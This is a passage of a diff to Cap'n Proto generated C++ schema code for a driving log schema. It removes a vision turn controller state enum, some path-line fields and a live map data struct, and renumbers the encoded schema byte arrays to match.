1, 0, 0, - 45, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 41, 0, 0, 0, 103, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 111, 103, 46, 99, 97, 112, 110, - 112, 58, 76, 111, 110, 103, 105, 116, - 117, 100, 105, 110, 97, 108, 80, 108, - 97, 110, 46, 86, 105, 115, 105, 111, - 110, 84, 117, 114, 110, 67, 111, 110, - 116, 114, 111, 108, 108, 101, 114, 83, - 116, 97, 116, 101, 0, 0, 0, 0, - 0, 0, 0, 0, 1, 0, 1, 0, - 16, 0, 0, 0, 1, 0, 2, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 41, 0, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 37, 0, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 33, 0, 0, 0, 66, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 3, 0, 0, 0, 0, 0, 0, 0, - 25, 0, 0, 0, 66, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 105, 115, 97, 98, 108, 101, 100, - 0, 0, 0, 0, 0, 0, 0, 0, - 101, 110, 116, 101, 114, 105, 110, 103, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 105, 110, 103, 0, - 108, 101, 97, 118, 105, 110, 103, 0, } -}; -::capnp::word const* const bp_e1514857915ad376 = b_e1514857915ad376.words; -#if !CAPNP_LITE -static const uint16_t m_e1514857915ad376[] = {0, 1, 3, 2}; -const ::capnp::_::RawSchema s_e1514857915ad376 = { - 0xe1514857915ad376, b_e1514857915ad376.words, 39, nullptr, m_e1514857915ad376, - 0, 4, nullptr, nullptr, nullptr, { &s_e1514857915ad376, nullptr, nullptr, 0, 0, nullptr } -}; -#endif // !CAPNP_LITE -CAPNP_DEFINE_ENUM(VisionTurnControllerState_e1514857915ad376, e1514857915ad376); static const ::capnp::_::AlignedData<67> b_fc0c9bb05e3927c1 = { { 0, 0, 0, 0, 5, 0, 6, 0, 193, 39, 57, 94, 176, 155, 12, 252, @@ -12998,17 +12602,17 @@ const ::capnp::_::RawSchema s_fc0c9bb05e3927c1 = { 1, 3, i_fc0c9bb05e3927c1, nullptr, nullptr, { &s_fc0c9bb05e3927c1, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<667> b_e1e9318e2ae8b51e = { +static const ::capnp::_::AlignedData<627> b_e1e9318e2ae8b51e = { { 0, 0, 0, 0, 5, 0, 6, 0, 30, 181, 232, 42, 142, 49, 233, 225, 10, 0, 0, 0, 1, 0, 9, 0, 91, 40, 164, 37, 126, 241, 177, 243, - 11, 0, 7, 0, 0, 0, 0, 0, + 9, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 178, 0, 0, 0, 29, 0, 0, 0, 71, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 89, 0, 0, 0, 231, 7, 0, 0, + 89, 0, 0, 0, 119, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 108, 111, 103, 46, 99, 97, 112, 110, @@ -13031,259 +12635,245 @@ static const ::capnp::_::AlignedData<667> b_e1e9318e2ae8b51e = { 76, 97, 110, 101, 67, 104, 97, 110, 103, 101, 68, 105, 114, 101, 99, 116, 105, 111, 110, 0, 0, 0, 0, 0, - 144, 0, 0, 0, 3, 0, 4, 0, + 136, 0, 0, 0, 3, 0, 4, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 225, 3, 0, 0, 162, 0, 0, 0, + 169, 3, 0, 0, 162, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 172, 3, 0, 0, 3, 0, 1, 0, + 184, 3, 0, 0, 2, 0, 1, 0, + 22, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 1, 0, 1, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 181, 3, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 180, 3, 0, 0, 3, 0, 1, 0, + 208, 3, 0, 0, 2, 0, 1, 0, + 23, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 2, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 205, 3, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 204, 3, 0, 0, 3, 0, 1, 0, + 232, 3, 0, 0, 2, 0, 1, 0, + 21, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 3, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 229, 3, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 228, 3, 0, 0, 3, 0, 1, 0, 240, 3, 0, 0, 2, 0, 1, 0, - 24, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 1, 0, 1, 0, 0, 0, + 24, 0, 0, 0, 2, 0, 0, 0, + 0, 0, 1, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 237, 3, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 236, 3, 0, 0, 3, 0, 1, 0, 8, 4, 0, 0, 2, 0, 1, 0, - 25, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 2, 0, 0, 0, + 2, 0, 0, 0, 2, 0, 0, 0, + 0, 0, 1, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 4, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 4, 0, 0, 3, 0, 1, 0, - 32, 4, 0, 0, 2, 0, 1, 0, - 23, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 3, 0, 0, 0, + 16, 4, 0, 0, 2, 0, 1, 0, + 25, 0, 0, 0, 3, 0, 0, 0, + 0, 0, 1, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 29, 4, 0, 0, 130, 0, 0, 0, + 13, 4, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 28, 4, 0, 0, 3, 0, 1, 0, + 12, 4, 0, 0, 3, 0, 1, 0, 40, 4, 0, 0, 2, 0, 1, 0, - 26, 0, 0, 0, 2, 0, 0, 0, - 0, 0, 1, 0, 4, 0, 0, 0, + 3, 0, 0, 0, 3, 0, 0, 0, + 0, 0, 1, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 37, 4, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 36, 4, 0, 0, 3, 0, 1, 0, + 48, 4, 0, 0, 2, 0, 1, 0, + 31, 0, 0, 0, 4, 0, 0, 0, + 0, 0, 1, 0, 8, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 45, 4, 0, 0, 218, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 52, 4, 0, 0, 3, 0, 1, 0, 64, 4, 0, 0, 2, 0, 1, 0, - 2, 0, 0, 0, 2, 0, 0, 0, - 0, 0, 1, 0, 5, 0, 0, 0, + 6, 0, 0, 0, 160, 0, 0, 0, + 0, 0, 1, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 61, 4, 0, 0, 130, 0, 0, 0, + 61, 4, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 60, 4, 0, 0, 3, 0, 1, 0, - 72, 4, 0, 0, 2, 0, 1, 0, - 27, 0, 0, 0, 3, 0, 0, 0, - 0, 0, 1, 0, 6, 0, 0, 0, + 64, 4, 0, 0, 3, 0, 1, 0, + 76, 4, 0, 0, 2, 0, 1, 0, + 30, 0, 0, 0, 161, 0, 0, 0, + 0, 0, 1, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 69, 4, 0, 0, 130, 0, 0, 0, + 73, 4, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 68, 4, 0, 0, 3, 0, 1, 0, - 96, 4, 0, 0, 2, 0, 1, 0, - 3, 0, 0, 0, 3, 0, 0, 0, - 0, 0, 1, 0, 7, 0, 0, 0, + 76, 4, 0, 0, 3, 0, 1, 0, + 88, 4, 0, 0, 2, 0, 1, 0, + 33, 0, 0, 0, 6, 0, 0, 0, + 0, 0, 1, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 93, 4, 0, 0, 130, 0, 0, 0, + 85, 4, 0, 0, 202, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 92, 4, 0, 0, 3, 0, 1, 0, 104, 4, 0, 0, 2, 0, 1, 0, - 33, 0, 0, 0, 4, 0, 0, 0, - 0, 0, 1, 0, 8, 0, 0, 0, + 26, 0, 0, 0, 162, 0, 0, 0, + 0, 0, 1, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 101, 4, 0, 0, 218, 0, 0, 0, + 101, 4, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 108, 4, 0, 0, 3, 0, 1, 0, - 120, 4, 0, 0, 2, 0, 1, 0, - 8, 0, 0, 0, 160, 0, 0, 0, - 0, 0, 1, 0, 9, 0, 0, 0, + 104, 4, 0, 0, 3, 0, 1, 0, + 116, 4, 0, 0, 2, 0, 1, 0, + 32, 0, 0, 0, 7, 0, 0, 0, + 0, 0, 1, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 117, 4, 0, 0, 138, 0, 0, 0, + 113, 4, 0, 0, 210, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 120, 4, 0, 0, 3, 0, 1, 0, 132, 4, 0, 0, 2, 0, 1, 0, - 32, 0, 0, 0, 161, 0, 0, 0, - 0, 0, 1, 0, 10, 0, 0, 0, + 29, 0, 0, 0, 163, 0, 0, 0, + 0, 0, 1, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 129, 4, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 132, 4, 0, 0, 3, 0, 1, 0, 144, 4, 0, 0, 2, 0, 1, 0, - 35, 0, 0, 0, 6, 0, 0, 0, - 0, 0, 1, 0, 11, 0, 0, 0, + 27, 0, 0, 0, 164, 0, 0, 0, + 0, 0, 1, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 141, 4, 0, 0, 202, 0, 0, 0, + 141, 4, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 148, 4, 0, 0, 3, 0, 1, 0, - 160, 4, 0, 0, 2, 0, 1, 0, - 28, 0, 0, 0, 162, 0, 0, 0, - 0, 0, 1, 0, 12, 0, 0, 0, + 144, 4, 0, 0, 3, 0, 1, 0, + 156, 4, 0, 0, 2, 0, 1, 0, + 28, 0, 0, 0, 165, 0, 0, 0, + 0, 0, 1, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 157, 4, 0, 0, 170, 0, 0, 0, + 153, 4, 0, 0, 186, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 156, 4, 0, 0, 3, 0, 1, 0, + 168, 4, 0, 0, 2, 0, 1, 0, + 7, 0, 0, 0, 11, 0, 0, 0, + 0, 0, 1, 0, 17, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 165, 4, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 160, 4, 0, 0, 3, 0, 1, 0, 172, 4, 0, 0, 2, 0, 1, 0, - 34, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 1, 0, 13, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 169, 4, 0, 0, 210, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 176, 4, 0, 0, 3, 0, 1, 0, - 188, 4, 0, 0, 2, 0, 1, 0, - 31, 0, 0, 0, 163, 0, 0, 0, - 0, 0, 1, 0, 14, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 185, 4, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 188, 4, 0, 0, 3, 0, 1, 0, - 200, 4, 0, 0, 2, 0, 1, 0, - 29, 0, 0, 0, 164, 0, 0, 0, - 0, 0, 1, 0, 15, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 197, 4, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 200, 4, 0, 0, 3, 0, 1, 0, - 212, 4, 0, 0, 2, 0, 1, 0, - 30, 0, 0, 0, 165, 0, 0, 0, - 0, 0, 1, 0, 16, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 209, 4, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 212, 4, 0, 0, 3, 0, 1, 0, - 224, 4, 0, 0, 2, 0, 1, 0, - 9, 0, 0, 0, 11, 0, 0, 0, - 0, 0, 1, 0, 17, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 221, 4, 0, 0, 58, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 216, 4, 0, 0, 3, 0, 1, 0, - 228, 4, 0, 0, 2, 0, 1, 0, - 10, 0, 0, 0, 16, 0, 0, 0, + 8, 0, 0, 0, 16, 0, 0, 0, 0, 0, 1, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 225, 4, 0, 0, 130, 0, 0, 0, + 169, 4, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 224, 4, 0, 0, 3, 0, 1, 0, - 236, 4, 0, 0, 2, 0, 1, 0, - 11, 0, 0, 0, 17, 0, 0, 0, + 168, 4, 0, 0, 3, 0, 1, 0, + 180, 4, 0, 0, 2, 0, 1, 0, + 9, 0, 0, 0, 17, 0, 0, 0, 0, 0, 1, 0, 19, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 233, 4, 0, 0, 162, 0, 0, 0, + 177, 4, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 236, 4, 0, 0, 3, 0, 1, 0, - 248, 4, 0, 0, 2, 0, 1, 0, + 180, 4, 0, 0, 3, 0, 1, 0, + 192, 4, 0, 0, 2, 0, 1, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 245, 4, 0, 0, 98, 0, 0, 0, + 189, 4, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 244, 4, 0, 0, 3, 0, 1, 0, - 16, 5, 0, 0, 2, 0, 1, 0, + 188, 4, 0, 0, 3, 0, 1, 0, + 216, 4, 0, 0, 2, 0, 1, 0, 5, 0, 0, 0, 9, 0, 0, 0, 0, 0, 1, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 13, 5, 0, 0, 130, 0, 0, 0, + 213, 4, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 12, 5, 0, 0, 3, 0, 1, 0, - 24, 5, 0, 0, 2, 0, 1, 0, - 19, 0, 0, 0, 10, 0, 0, 0, + 212, 4, 0, 0, 3, 0, 1, 0, + 224, 4, 0, 0, 2, 0, 1, 0, + 17, 0, 0, 0, 10, 0, 0, 0, 0, 0, 1, 0, 22, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 21, 5, 0, 0, 162, 0, 0, 0, + 221, 4, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 24, 5, 0, 0, 3, 0, 1, 0, - 36, 5, 0, 0, 2, 0, 1, 0, - 20, 0, 0, 0, 11, 0, 0, 0, + 224, 4, 0, 0, 3, 0, 1, 0, + 236, 4, 0, 0, 2, 0, 1, 0, + 18, 0, 0, 0, 11, 0, 0, 0, 0, 0, 1, 0, 23, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 33, 5, 0, 0, 194, 0, 0, 0, + 233, 4, 0, 0, 194, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 36, 5, 0, 0, 3, 0, 1, 0, - 48, 5, 0, 0, 2, 0, 1, 0, - 21, 0, 0, 0, 12, 0, 0, 0, + 236, 4, 0, 0, 3, 0, 1, 0, + 248, 4, 0, 0, 2, 0, 1, 0, + 19, 0, 0, 0, 12, 0, 0, 0, 0, 0, 1, 0, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 45, 5, 0, 0, 186, 0, 0, 0, + 245, 4, 0, 0, 186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 48, 5, 0, 0, 3, 0, 1, 0, - 60, 5, 0, 0, 2, 0, 1, 0, - 22, 0, 0, 0, 13, 0, 0, 0, + 248, 4, 0, 0, 3, 0, 1, 0, + 4, 5, 0, 0, 2, 0, 1, 0, + 20, 0, 0, 0, 13, 0, 0, 0, 0, 0, 1, 0, 25, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 57, 5, 0, 0, 218, 0, 0, 0, + 1, 5, 0, 0, 218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 64, 5, 0, 0, 3, 0, 1, 0, - 76, 5, 0, 0, 2, 0, 1, 0, - 13, 0, 0, 0, 5, 0, 0, 0, + 8, 5, 0, 0, 3, 0, 1, 0, + 20, 5, 0, 0, 2, 0, 1, 0, + 11, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 73, 5, 0, 0, 42, 0, 0, 0, + 17, 5, 0, 0, 42, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 68, 5, 0, 0, 3, 0, 1, 0, - 96, 5, 0, 0, 2, 0, 1, 0, - 14, 0, 0, 0, 6, 0, 0, 0, + 12, 5, 0, 0, 3, 0, 1, 0, + 40, 5, 0, 0, 2, 0, 1, 0, + 12, 0, 0, 0, 6, 0, 0, 0, 0, 0, 1, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 93, 5, 0, 0, 90, 0, 0, 0, + 37, 5, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 92, 5, 0, 0, 3, 0, 1, 0, - 120, 5, 0, 0, 2, 0, 1, 0, - 15, 0, 0, 0, 7, 0, 0, 0, + 36, 5, 0, 0, 3, 0, 1, 0, + 64, 5, 0, 0, 2, 0, 1, 0, + 13, 0, 0, 0, 7, 0, 0, 0, 0, 0, 1, 0, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 117, 5, 0, 0, 122, 0, 0, 0, + 61, 5, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 116, 5, 0, 0, 3, 0, 1, 0, - 144, 5, 0, 0, 2, 0, 1, 0, - 12, 0, 0, 0, 166, 0, 0, 0, + 60, 5, 0, 0, 3, 0, 1, 0, + 88, 5, 0, 0, 2, 0, 1, 0, + 10, 0, 0, 0, 166, 0, 0, 0, 0, 0, 1, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 141, 5, 0, 0, 106, 0, 0, 0, + 85, 5, 0, 0, 106, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 140, 5, 0, 0, 3, 0, 1, 0, - 152, 5, 0, 0, 2, 0, 1, 0, - 16, 0, 0, 0, 14, 0, 0, 0, + 84, 5, 0, 0, 3, 0, 1, 0, + 96, 5, 0, 0, 2, 0, 1, 0, + 14, 0, 0, 0, 14, 0, 0, 0, 0, 0, 1, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 149, 5, 0, 0, 162, 0, 0, 0, + 93, 5, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 152, 5, 0, 0, 3, 0, 1, 0, - 164, 5, 0, 0, 2, 0, 1, 0, + 96, 5, 0, 0, 3, 0, 1, 0, + 108, 5, 0, 0, 2, 0, 1, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 1, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 161, 5, 0, 0, 114, 0, 0, 0, + 105, 5, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 160, 5, 0, 0, 3, 0, 1, 0, - 172, 5, 0, 0, 2, 0, 1, 0, - 17, 0, 0, 0, 15, 0, 0, 0, + 104, 5, 0, 0, 3, 0, 1, 0, + 116, 5, 0, 0, 2, 0, 1, 0, + 15, 0, 0, 0, 15, 0, 0, 0, 0, 0, 1, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 169, 5, 0, 0, 90, 0, 0, 0, + 113, 5, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 168, 5, 0, 0, 3, 0, 1, 0, - 180, 5, 0, 0, 2, 0, 1, 0, - 18, 0, 0, 0, 8, 0, 0, 0, + 112, 5, 0, 0, 3, 0, 1, 0, + 124, 5, 0, 0, 2, 0, 1, 0, + 16, 0, 0, 0, 8, 0, 0, 0, 0, 0, 1, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 177, 5, 0, 0, 98, 0, 0, 0, + 121, 5, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 176, 5, 0, 0, 3, 0, 1, 0, - 188, 5, 0, 0, 2, 0, 1, 0, - 6, 0, 0, 0, 9, 0, 0, 0, - 0, 0, 1, 0, 34, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 185, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 184, 5, 0, 0, 3, 0, 1, 0, - 212, 5, 0, 0, 2, 0, 1, 0, - 7, 0, 0, 0, 10, 0, 0, 0, - 0, 0, 1, 0, 35, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 209, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 208, 5, 0, 0, 3, 0, 1, 0, - 236, 5, 0, 0, 2, 0, 1, 0, + 120, 5, 0, 0, 3, 0, 1, 0, + 132, 5, 0, 0, 2, 0, 1, 0, 108, 97, 110, 101, 87, 105, 100, 116, 104, 68, 69, 80, 82, 69, 67, 65, 84, 69, 68, 0, 0, 0, 0, 0, @@ -13638,32 +13228,6 @@ static const ::capnp::_::AlignedData<667> b_e1e9318e2ae8b51e = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 80, 97, 116, 104, 87, 76, 105, - 110, 101, 115, 88, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 3, 0, 1, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 80, 97, 116, 104, 87, 76, 105, - 110, 101, 115, 89, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 3, 0, 1, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, } }; @@ -13675,11 +13239,11 @@ static const ::capnp::_::RawSchema* const d_e1e9318e2ae8b51e[] = { &s_fac297f195ce56d2, &s_fdca7c675b7021c6, }; -static const uint16_t m_e1e9318e2ae8b51e[] = {11, 2, 3, 15, 22, 23, 28, 27, 20, 34, 35, 1, 21, 17, 4, 5, 19, 18, 0, 31, 12, 9, 10, 16, 26, 6, 7, 24, 25, 14, 32, 30, 33, 8, 13, 29}; -static const uint16_t i_e1e9318e2ae8b51e[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35}; +static const uint16_t m_e1e9318e2ae8b51e[] = {11, 2, 3, 15, 22, 23, 28, 27, 20, 1, 21, 17, 4, 5, 19, 18, 0, 31, 12, 9, 10, 16, 26, 6, 7, 24, 25, 14, 32, 30, 33, 8, 13, 29}; +static const uint16_t i_e1e9318e2ae8b51e[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33}; const ::capnp::_::RawSchema s_e1e9318e2ae8b51e = { - 0xe1e9318e2ae8b51e, b_e1e9318e2ae8b51e.words, 667, d_e1e9318e2ae8b51e, m_e1e9318e2ae8b51e, - 4, 36, i_e1e9318e2ae8b51e, nullptr, nullptr, { &s_e1e9318e2ae8b51e, nullptr, nullptr, 0, 0, nullptr } + 0xe1e9318e2ae8b51e, b_e1e9318e2ae8b51e.words, 627, d_e1e9318e2ae8b51e, m_e1e9318e2ae8b51e, + 4, 34, i_e1e9318e2ae8b51e, nullptr, nullptr, { &s_e1e9318e2ae8b51e, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE static const ::capnp::_::AlignedData<61> b_fdca7c675b7021c6 = { @@ -25645,382 +25209,6 @@ const ::capnp::_::RawSchema s_fa9a296b9fd41a96 = { 0, 10, i_fa9a296b9fd41a96, nullptr, nullptr, { &s_fa9a296b9fd41a96, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<365> b_9854f620f0d3b9cc = { - { 0, 0, 0, 0, 5, 0, 6, 0, - 204, 185, 211, 240, 32, 246, 84, 152, - 10, 0, 0, 0, 1, 0, 8, 0, - 91, 40, 164, 37, 126, 241, 177, 243, - 4, 0, 7, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 178, 0, 0, 0, - 29, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 25, 0, 0, 0, 103, 4, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 111, 103, 46, 99, 97, 112, 110, - 112, 58, 76, 105, 118, 101, 77, 97, - 112, 68, 97, 116, 97, 0, 0, 0, - 0, 0, 0, 0, 1, 0, 1, 0, - 80, 0, 0, 0, 3, 0, 4, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 1, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 33, 2, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 32, 2, 0, 0, 3, 0, 1, 0, - 44, 2, 0, 0, 2, 0, 1, 0, - 1, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 1, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 41, 2, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 40, 2, 0, 0, 3, 0, 1, 0, - 52, 2, 0, 0, 2, 0, 1, 0, - 2, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 2, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 49, 2, 0, 0, 170, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 52, 2, 0, 0, 3, 0, 1, 0, - 64, 2, 0, 0, 2, 0, 1, 0, - 3, 0, 0, 0, 2, 0, 0, 0, - 0, 0, 1, 0, 3, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 61, 2, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 60, 2, 0, 0, 3, 0, 1, 0, - 72, 2, 0, 0, 2, 0, 1, 0, - 4, 0, 0, 0, 3, 0, 0, 0, - 0, 0, 1, 0, 4, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 69, 2, 0, 0, 194, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 72, 2, 0, 0, 3, 0, 1, 0, - 84, 2, 0, 0, 2, 0, 1, 0, - 5, 0, 0, 0, 2, 0, 0, 0, - 0, 0, 1, 0, 5, 0, 0, 0, - 